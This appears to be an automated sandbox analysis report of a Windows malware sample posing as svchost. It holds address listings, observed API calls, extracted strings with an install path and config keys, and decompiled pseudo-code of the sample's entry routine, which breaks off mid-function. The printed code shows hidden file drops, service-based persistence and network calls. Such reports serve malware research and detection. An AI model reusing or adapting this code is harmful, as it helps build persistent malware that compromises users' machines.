                                                                                                                                  0x0251da03
                                                                                                                                  0x0251da06
                                                                                                                                  0x0251da08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da08
                                                                                                                                  0x0251d998
                                                                                                                                  0x0251d99a
                                                                                                                                  0x0251d99d
                                                                                                                                  0x0251d99f
                                                                                                                                  0x0251d9ab
                                                                                                                                  0x0251d9b4
                                                                                                                                  0x0251d9b9
                                                                                                                                  0x0251d9be
                                                                                                                                  0x0251d9be
                                                                                                                                  0x0251d9c1
                                                                                                                                  0x0251d9c7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d9c7
                                                                                                                                  0x0251d969
                                                                                                                                  0x0251d96f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d96f
                                                                                                                                  0x0251d8da
                                                                                                                                  0x0251d8df
                                                                                                                                  0x0251d8e4
                                                                                                                                  0x0251d8e7
                                                                                                                                  0x0251d8e7
                                                                                                                                  0x0251d8ea
                                                                                                                                  0x0251d8ea
                                                                                                                                  0x0251d8ec
                                                                                                                                  0x0251d8ed
                                                                                                                                  0x0251d8ed
                                                                                                                                  0x0251d8f1
                                                                                                                                  0x0251d8f3
                                                                                                                                  0x0251d8f6
                                                                                                                                  0x0251d8f8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d903
                                                                                                                                  0x0251d918
                                                                                                                                  0x0251d92a
                                                                                                                                  0x0251d92f
                                                                                                                                  0x0251d932
                                                                                                                                  0x0251d934
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d934
                                                                                                                                  0x0251d7a8
                                                                                                                                  0x0251d7aa
                                                                                                                                  0x0251d7b0
                                                                                                                                  0x0251d7be
                                                                                                                                  0x0251d7c3
                                                                                                                                  0x0251d7cf
                                                                                                                                  0x0251d7d6
                                                                                                                                  0x0251d7e1
                                                                                                                                  0x0251d7e2
                                                                                                                                  0x0251d7e2
                                                                                                                                  0x0251d7e5
                                                                                                                                  0x0251d7ed
                                                                                                                                  0x0251d7ee
                                                                                                                                  0x0251d7f4
                                                                                                                                  0x0251d81f
                                                                                                                                  0x0251d825
                                                                                                                                  0x0251d828
                                                                                                                                  0x0251d828
                                                                                                                                  0x0251d82a
                                                                                                                                  0x0251d830
                                                                                                                                  0x0251d832
0x0251d85b 0x0251d85b 0x0251d85d 0x00000000 0x00000000 0x0251d878 0x0251d87f 0x0251d884
0x0251d887 0x0251d889 0x00000000 0x00000000 0x0251d88f 0x0251d895 0x0251d897 0x0251d897
0x0251d89d 0x0251d8a2 0x0251d8a4 0x0251d8a7 0x0251d8ad 0x0251d8ad 0x00000000 0x0251d834
0x0251d834 0x0251d836 0x0251d836 0x0251d839 0x0251d839 0x0251d83b 0x0251d83c 0x0251d83c
0x0251d842 0x0251d847 0x0251d850 0x0251d855 0x0251d858 0x0251d858 0x00000000 0x0251d858
0x0251d832 0x0251d783 0x0251d792 0x0251d797 0x0251d79a 0x0251d79c 0x00000000 0x00000000
0x0251d773 0x0251d778 0x0251d77b 0x0251d77d 0x00000000 0x00000000 0x0251d77d 0x00000000
0x0251d783 0x0251d70d 0x0251d712 0x0251d718 0x0251d71f 0x0251d721 0x00000000 0x00000000
0x0251d73d 0x0251d744 0x0251d749 0x0251d74c 0x0251d74e 0x00000000 0x00000000 0x00000000
0x0251d74e 0x0251d6d3 0x0251d6f0 0x0251d6f7 0x0251d6fc 0x0251d6ff 0x0251d701 0x00000000
0x00000000 0x00000000 0x0251d701 0x0251d67a 0x0251d67b 0x0251d67c 0x0251d6bb 0x0251d6bb
0x0251d6c0 0x0251d6c3 0x0251d6c5 0x00000000 0x00000000 0x0251d67f 0x0251d696 0x0251d69d
0x0251d6a2 0x0251d6a5 0x0251d6a7 0x00000000 0x00000000 0x0251d6b0 0x0251d6b0 0x0251d6b3
0x0251d6b4 0x0251d6b5 0x0251d6b5 0x00000000 0x0251d6bb 0x0251cbc7 0x0251cbca 0x0251d5f2
0x0251d5f8 0x0251d5fa 0x0251d600 0x0251d611 0x0251d616 0x0251d61e 0x0251d621 0x0251d623
0x0251d62e 0x0251d635 0x0251d637 0x0251d63d 0x0251d643 0x0251d649 0x0251d64f 0x0251d655
0x0251d65a 0x0251d65a 0x0251d637 0x0251d623 0x00000000 0x0251d5fa 0x0251cbd0 0x0251cbd3
0x0251d5e1 0x0251cdec 0x00000000 0x0251cdec 0x0251cbd9 0x0251d589 0x0251d589 0x0251d589
0x0251d58b 0x0251d58b 0x0251d58b 0x0251d591 0x0251d593 0x00000000 0x00000000 0x0251d595
0x0251d598 0x0251d59a 0x00000000 0x00000000 0x0251d59c 0x0251d59e 0x0251d59e 0x0251d5a1
0x0251d5a1 0x0251d5a3 0x0251d5a5 0x00000000 0x00000000 0x0251d5a7 0x0251d5aa 0x0251d5c3
0x0251d5c5 0x00000000 0x0251d5c5 0x0251d5ac 0x0251d5ad 0x0251d5b0 0x0251d5b3 0x00000000
0x00000000 0x00000000 0x0251d5b5 0x0251d5c8 0x0251d5c8 0x0251d5cb 0x0251d5cb 0x00000000
0x0251d5d3 0x0251cbdf 0x0251cbe2 0x0251ce26 0x0251ce2c 0x0251ce2e 0x0251ce31 0x0251ce34
0x0251ce36 0x0251cea0 0x0251cea0 0x0251cea8 0x0251cea8 0x0251ceaf 0x0251ceb9 0x0251cebf
0x0251cec2 0x0251d53e 0x0251d53e 0x0251d541 0x00000000 0x00000000 0x0251cec9 0x0251cecc
0x00000000 0x00000000 0x0251ced2 0x0251ced5 0x0251d519 0x0251d519 0x0251d524 0x0251d526
0x0251d529 0x0251d53b 0x00000000 0x0251cedb 0x0251cee8 0x0251ceed 0x0251ceef 0x0251cef2
0x0251cef4 0x0251cef9 0x0251cefe 0x0251cf00 0x0251cf00 0x0251cf02 0x0251cf02 0x0251cf04
0x0251cf06 0x0251cf0b 0x0251cf0d 0x0251cf12 0x0251cf14 0x0251cf1a 0x0251cf20 0x0251cf20
0x0251cf1c 0x0251cf1c 0x0251cf1c 0x0251cf25 0x0251cf25 0x0251cf27 0x0251cf29 0x0251cf2b
0x0251cf81 0x0251cf83 0x0251cfdc 0x0251cfe1 0x0251d020 0x0251d025 0x00000000 0x00000000
0x0251d033
                                                                                                                                  0x0251d039
                                                                                                                                  0x0251d03f
                                                                                                                                  0x0251d042
                                                                                                                                  0x0251d042
                                                                                                                                  0x0251d044
                                                                                                                                  0x0251d045
                                                                                                                                  0x0251d045
                                                                                                                                  0x0251d049
                                                                                                                                  0x0251d04b
                                                                                                                                  0x0251d04d
                                                                                                                                  0x0251d04f
                                                                                                                                  0x0251d057
                                                                                                                                  0x0251d059
                                                                                                                                  0x0251d059
                                                                                                                                  0x0251d057
                                                                                                                                  0x0251d06d
                                                                                                                                  0x0251d073
                                                                                                                                  0x0251d07a
                                                                                                                                  0x0251d07a
                                                                                                                                  0x0251d07d
                                                                                                                                  0x0251d07d
                                                                                                                                  0x0251d07f
                                                                                                                                  0x0251d080
                                                                                                                                  0x0251d080
                                                                                                                                  0x0251d084
                                                                                                                                  0x0251d084
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d084
                                                                                                                                  0x0251cfef
                                                                                                                                  0x0251cff5
                                                                                                                                  0x0251cffb
                                                                                                                                  0x0251cffe
                                                                                                                                  0x0251cffe
                                                                                                                                  0x0251d000
                                                                                                                                  0x0251d001
                                                                                                                                  0x0251d001
                                                                                                                                  0x0251d005
                                                                                                                                  0x0251d005
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cf85
                                                                                                                                  0x0251cfb1
                                                                                                                                  0x0251cfbe
                                                                                                                                  0x0251cfc3
                                                                                                                                  0x0251cfc9
                                                                                                                                  0x0251cfcc
                                                                                                                                  0x0251cfcc
                                                                                                                                  0x0251d007
                                                                                                                                  0x0251d007
                                                                                                                                  0x0251d009
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d00b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfcf
                                                                                                                                  0x0251cfcf
                                                                                                                                  0x0251cfd1
                                                                                                                                  0x0251cfd2
                                                                                                                                  0x0251cfd4
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfd6
                                                                                                                                  0x0251cfd8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfd8
                                                                                                                                  0x0251cfd4
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf30
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf5a
                                                                                                                                  0x0251cf5b
                                                                                                                                  0x0251cf5b
                                                                                                                                  0x0251cf61
                                                                                                                                  0x0251cf63
                                                                                                                                  0x0251cf65
                                                                                                                                  0x0251d086
                                                                                                                                  0x0251d086
                                                                                                                                  0x0251d089
                                                                                                                                  0x0251d0fe
                                                                                                                                  0x0251d0fe
                                                                                                                                  0x0251d104
                                                                                                                                  0x0251d104
                                                                                                                                  0x0251d105
                                                                                                                                  0x0251d10c
                                                                                                                                  0x0251d112
                                                                                                                                  0x0251d112
                                                                                                                                  0x0251d115
                                                                                                                                  0x0251d124
                                                                                                                                  0x0251d129
                                                                                                                                  0x0251d129
                                                                                                                                  0x0251d12c
                                                                                                                                  0x0251d130
                                                                                                                                  0x0251d13e
                                                                                                                                  0x0251d144
                                                                                                                                  0x0251d145
                                                                                                                                  0x0251d147
                                                                                                                                  0x0251d155
                                                                                                                                  0x0251d155
                                                                                                                                  0x0251d147
                                                                                                                                  0x0251d177
                                                                                                                                  0x0251d179
                                                                                                                                  0x0251d17c
                                                                                                                                  0x0251d33e
                                                                                                                                  0x0251d372
                                                                                                                                  0x0251d37f
                                                                                                                                  0x0251d384
                                                                                                                                  0x0251d38a
                                                                                                                                  0x0251d38d
                                                                                                                                  0x0251d390
                                                                                                                                  0x0251d390
                                                                                                                                  0x0251d392
                                                                                                                                  0x0251d393
                                                                                                                                  0x0251d393
                                                                                                                                  0x0251d397
                                                                                                                                  0x0251d399
                                                                                                                                  0x0251d39b
                                                                                                                                  0x0251d39d
                                                                                                                                  0x0251d3a5
                                                                                                                                  0x0251d3a7
                                                                                                                                  0x0251d3a7
                                                                                                                                  0x0251d3a5
                                                                                                                                  0x0251d3af
                                                                                                                                  0x0251d3bd
                                                                                                                                  0x0251d3c3
                                                                                                                                  0x0251d3c7
                                                                                                                                  0x0251d3d5
                                                                                                                                  0x0251d3db
                                                                                                                                  0x0251d3dc
                                                                                                                                  0x0251d3de
                                                                                                                                  0x0251d3ec
                                                                                                                                  0x0251d3ec
                                                                                                                                  0x0251d3de
                                                                                                                                  0x0251d40e
                                                                                                                                  0x0251d410
                                                                                                                                  0x0251d413
                                                                                                                                  0x0251d420
                                                                                                                                  0x0251d428
                                                                                                                                  0x0251d42f
                                                                                                                                  0x0251d435
                                                                                                                                  0x0251d439
                                                                                                                                  0x0251d447
                                                                                                                                  0x0251d44d
                                                                                                                                  0x0251d44e
                                                                                                                                  0x0251d450
                                                                                                                                  0x0251d45b
                                                                                                                                  0x0251d45b
                                                                                                                                  0x0251d450
                                                                                                                                  0x0251d461
                                                                                                                                  0x0251d461
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d182
                                                                                                                                  0x0251d18d
                                                                                                                                  0x0251d195
                                                                                                                                  0x0251d19c
                                                                                                                                  0x0251d1a2
                                                                                                                                  0x0251d1a6
                                                                                                                                  0x0251d1b4
                                                                                                                                  0x0251d1bb
                                                                                                                                  0x0251d1bd
                                                                                                                                  0x0251d1c8
                                                                                                                                  0x0251d1c8
                                                                                                                                  0x0251d1bd
                                                                                                                                  0x0251d1da
                                                                                                                                  0x0251d1e1
                                                                                                                                  0x0251d1e7
                                                                                                                                  0x0251d1e8
                                                                                                                                  0x0251d1ea
                                                                                                                                  0x0251d468
                                                                                                                                  0x0251d468
                                                                                                                                  0x0251d46b
                                                                                                                                  0x0251d47a
                                                                                                                                  0x0251d47f
                                                                                                                                  0x0251d47f
                                                                                                                                  0x0251d482
                                                                                                                                  0x0251d485
                                                                                                                                  0x0251d48b
                                                                                                                                  0x0251d48e
                                                                                                                                  0x0251d496
                                                                                                                                  0x0251d49b
                                                                                                                                  0x0251d4a2
                                                                                                                                  0x0251d4ac
                                                                                                                                  0x0251d4b1
                                                                                                                                  0x0251d4d8
                                                                                                                                  0x0251d4de
                                                                                                                                  0x0251d4e4
                                                                                                                                  0x0251d4e6
                                                                                                                                  0x0251d500
                                                                                                                                  0x0251d506
                                                                                                                                  0x0251d513
                                                                                                                                  0x0251d4e8
                                                                                                                                  0x0251d4f4
                                                                                                                                  0x0251d4fc
                                                                                                                                  0x0251cdb2
                                                                                                                                  0x0251cdb2
                                                                                                                                  0x0251cdb8
                                                                                                                                  0x0251cdc4
                                                                                                                                  0x0251cdc4
                                                                                                                                  0x0251cce7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ccc0
                                                                                                                                  0x0251cc66
                                                                                                                                  0x0251cc16
                                                                                                                                  0x0251dad2
                                                                                                                                  0x0251dad5
                                                                                                                                  0x0251dadb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cb60
                                                                                                                                  0x0251cb63
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cb63
                                                                                                                                  0x0251cb5e
                                                                                                                                  0x0251ca4b
                                                                                                                                  0x0251ca4e
                                                                                                                                  0x0251ca4e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9d2
                                                                                                                                  0x0251c9d2
                                                                                                                                  0x0251c9d8
                                                                                                                                  0x0251c9dd
                                                                                                                                  0x0251c9e0
                                                                                                                                  0x0251c9e1
                                                                                                                                  0x0251c9e3
                                                                                                                                  0x0251c9e9
                                                                                                                                  0x0251c9f1
                                                                                                                                  0x0251c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9d8
                                                                                                                                  0x0251c9d0
                                                                                                                                  0x0251c9a5
                                                                                                                                  0x0251c9ab
                                                                                                                                  0x0251c9b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9b2
                                                                                                                                  0x0251c92f
                                                                                                                                  0x0251c935
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251CA4E
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251CB63
                                                                                                                                  • GetTempPathA.KERNEL32(00000120,?), ref: 0251CC28
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251CCB4
                                                                                                                                  • WriteFile.KERNEL32(0251A4B3,?,-000000E8,?,00000000), ref: 0251CCDC
                                                                                                                                  • CloseHandle.KERNEL32(0251A4B3), ref: 0251CCED
                                                                                                                                  • wsprintfA.USER32 ref: 0251CD21
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0251CD77
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0251CD89
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0251CD98
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0251CD9D
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0251CDC4
                                                                                                                                  • CloseHandle.KERNEL32(0251A4B3), ref: 0251CDCC
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251CFB1
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0251CFEF
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0251D033
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108), ref: 0251D10C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0251D155
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0251D171
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000), ref: 0251D195
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0251D19C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002), ref: 0251D1C8
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251D231
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108,?,?,?,?,?,?,?,00000100), ref: 0251D27C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0251D2AB
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2C7
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2EB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2F2
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0251D326
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251D372
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108,?,?,?,?,?,?,?,00000100), ref: 0251D3BD
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0251D3EC
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D408
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D428
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0251D42F
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0251D45B
                                                                                                                                  • CreateProcessA.KERNEL32(?,02520264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0251D4DE
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D4F4
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D4FC
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D513
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251D56C
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0251D577
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0251D583
                                                                                                                                  • wsprintfA.USER32 ref: 0251D81F
                                                                                                                                    • Part of subcall function 0251C65C: send.WS2_32(00000000,?,00000000), ref: 0251C74B
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251DAD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                                                                  • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                                                                  • API String ID: 562065436-2967255785
                                                                                                                                  • Opcode ID: b5ed5fb410d02a62f8623589400c479bc27c930e8764a6525bcb8a0a4a870fe8
                                                                                                                                  • Instruction ID: 8fc921c6a8772b7db2b80318f4432ff1a94ac105cfbb212b200c262fe8360243
                                                                                                                                  • Opcode Fuzzy Hash: b5ed5fb410d02a62f8623589400c479bc27c930e8764a6525bcb8a0a4a870fe8
                                                                                                                                  • Instruction Fuzzy Hash: 88B2D072D81219ABFB20DFA4CC85EEA7BBDFB49304F05046AE905E21C0E7319959CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			_entry_(CHAR* _a12, void* _a15) {
                                                                                                                                  				char _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				union _GET_FILEEX_INFO_LEVELS _v36;
                                                                                                                                  				CHAR* _v40;
                                                                                                                                  				char _v44;
                                                                                                                                  				char _v48;
                                                                                                                                  				struct _PROCESS_INFORMATION _v64;
                                                                                                                                  				char _v80;
                                                                                                                                  				char _v112;
                                                                                                                                  				char _v371;
                                                                                                                                  				char _v372;
                                                                                                                                  				char _v671;
                                                                                                                                  				char _v672;
                                                                                                                                  				char _v704;
                                                                                                                                  				struct _STARTUPINFOA _v772;
                                                                                                                                  				char _v1271;
                                                                                                                                  				char _v1272;
                                                                                                                                  				char _v1672;
                                                                                                                                  				char _t238;
                                                                                                                                  				long _t239;
                                                                                                                                  				char _t242;
                                                                                                                                  				long _t244;
                                                                                                                                  				CHAR* _t248;
                                                                                                                                  				char _t250;
                                                                                                                                  				intOrPtr _t257;
                                                                                                                                  				char _t267;
                                                                                                                                  				intOrPtr* _t272;
                                                                                                                                  				char _t276;
                                                                                                                                  				char _t279;
                                                                                                                                  				char _t282;
                                                                                                                                  				char _t283;
                                                                                                                                  				void* _t284;
                                                                                                                                  				char _t294;
                                                                                                                                  				CHAR* _t303;
                                                                                                                                  				int _t304;
                                                                                                                                  				char _t309;
                                                                                                                                  				CHAR* _t312;
                                                                                                                                  				char _t318;
                                                                                                                                  				int _t324;
                                                                                                                                  				CHAR* _t325;
                                                                                                                                  				char _t328;
                                                                                                                                  				char* _t331;
                                                                                                                                  				char _t332;
                                                                                                                                  				char _t340;
                                                                                                                                  				char _t344;
                                                                                                                                  				CHAR* _t357;
                                                                                                                                  				CHAR* _t358;
                                                                                                                                  				int _t359;
                                                                                                                                  				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E02516511); // executed
				E0251EC54(); // executed
				_t475 =  *0x252201f; // 0x1
				if(_t475 != 0) {
					__eflags =  *0x25233d8; // 0x0
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0251405E, 0, 0, 0); // executed
						__imp__#115(0x1010,  &_v1672); // executed
						E0251E52E(_t449, __eflags);
						E0251EAAF(1, 0);
						E02511D96(_t438, 0x2522118);
						E025180C9(_t438); // executed
						CreateThread(0, 0, E0251877E, 0, 0, 0); // executed
						E02515E6C(__eflags);
						E02513132();
						E0251C125(__eflags);
						E02518DB1(_t438);
						Sleep(0xbb8); // executed
						E0251C4EE();
						while(1) {
							__eflags =  *0x25233d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x25233d0 - 0x109a0;
							if(_t239 -  *0x25233d0 < 0x109a0) {
								L131:
								Sleep(0x1a90); // executed
								continue;
							}
							L129:
							_t238 = E0251C913(); // executed
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x25233d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x25233d8); // executed
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0251EE2A(_t438, 0x25233d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0251EF00( &_v672,  &_v671);
						_t436 = E0251ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x25222f8;
					_a12 = _t248;
					_t250 = E0251EE95(_a12, E02512544(0x25222f8, 0x2520a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0251EE2A(_t438, 0x25222f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E025196AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112);
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0251EF00("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0251EE95(_a12, E02512544(0x25222f8, 0x2520a38, 4, 0xe4, 0xc8));
							E0251EE2A(_t438, 0x25222f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0251EE95(_a12, E02512544(_t459, 0x2520a28, 4, 0xe4, 0xc8));
								E0251EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E02516EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E025198F2(_t438);
										L19:
										ExitProcess(0);
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x25233b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E02519961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0251EF00("ghrubsm",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0251ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0251EE08(0x2522184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x2522184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0251ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0251EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0251EE08(0x25233d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x2522cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0251ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
                                                                                                                                  							}
                                                                                                                                  							_v24 = _t294 - _v8;
                                                                                                                                  							E0251EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
                                                                                                                                  							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
                                                                                                                                  							goto L98;
                                                                                                                                  						}
                                                                                                                                  						_v36 = 0;
                                                                                                                                  						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
                                                                                                                                  							L84:
                                                                                                                                  							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
                                                                                                                                  								_t303 =  &_v672;
                                                                                                                                  								if(_v672 == 0x22) {
                                                                                                                                  									_t303 =  &_v671;
                                                                                                                                  								}
